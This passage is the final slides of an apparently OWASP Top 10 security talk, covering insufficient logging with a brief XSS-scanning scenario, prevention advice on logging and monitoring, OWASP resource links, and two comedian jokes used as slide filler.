  • 58. • An attacker uses a security scanner (like the OWASP ZAP Proxy) to look for XSS vulnerabilities in your application. It makes lots of repeated requests that result in lots of 500 HTTP errors in a short period of time. But because there is no monitoring in place, those errors are ignored and no real users are complaining. An attack vector is discovered and a Stored XSS attack is created. #10 - INSUFFICIENT LOGGING Examples 58
  • 59. • Ensure all important events are logged. Especially access control successes and failures. • Ensure logs are generated in a format that is easily consumed • Centralized log management with tampering control • Effective monitoring and alerting to catch suspicious activity. • Establish an incident response and recovery plan: NIST 800-61 #10 - INSUFFICIENT LOGGING 59 Prevention
  • 60. 60 This jacket is dry clean only... which means it's dirty. - Mitch Hedberg 😜
  • 61. • https://www.owasp.org • https://www.owasp.org/images/7/72/ OWASP_Top_10-2017_%28en%29.pdf.pdf • https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet • https://www.owasp.org/index.php/Authentication_Cheat_Sheet • https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project Resources
  • 62. 62 I saw on HBO they were advertising this boxing match, it said "It's a fight to the finish"... that's a good place to end. - Mitch Hedberg 😜